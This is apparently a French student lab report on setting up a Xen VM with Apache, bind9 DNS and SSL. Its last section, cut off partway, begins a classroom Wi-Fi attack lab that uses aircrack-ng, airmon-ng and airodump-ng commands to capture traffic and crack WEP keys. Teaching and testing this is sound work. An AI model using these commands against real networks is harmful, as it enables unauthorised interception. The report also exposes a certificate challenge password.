      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
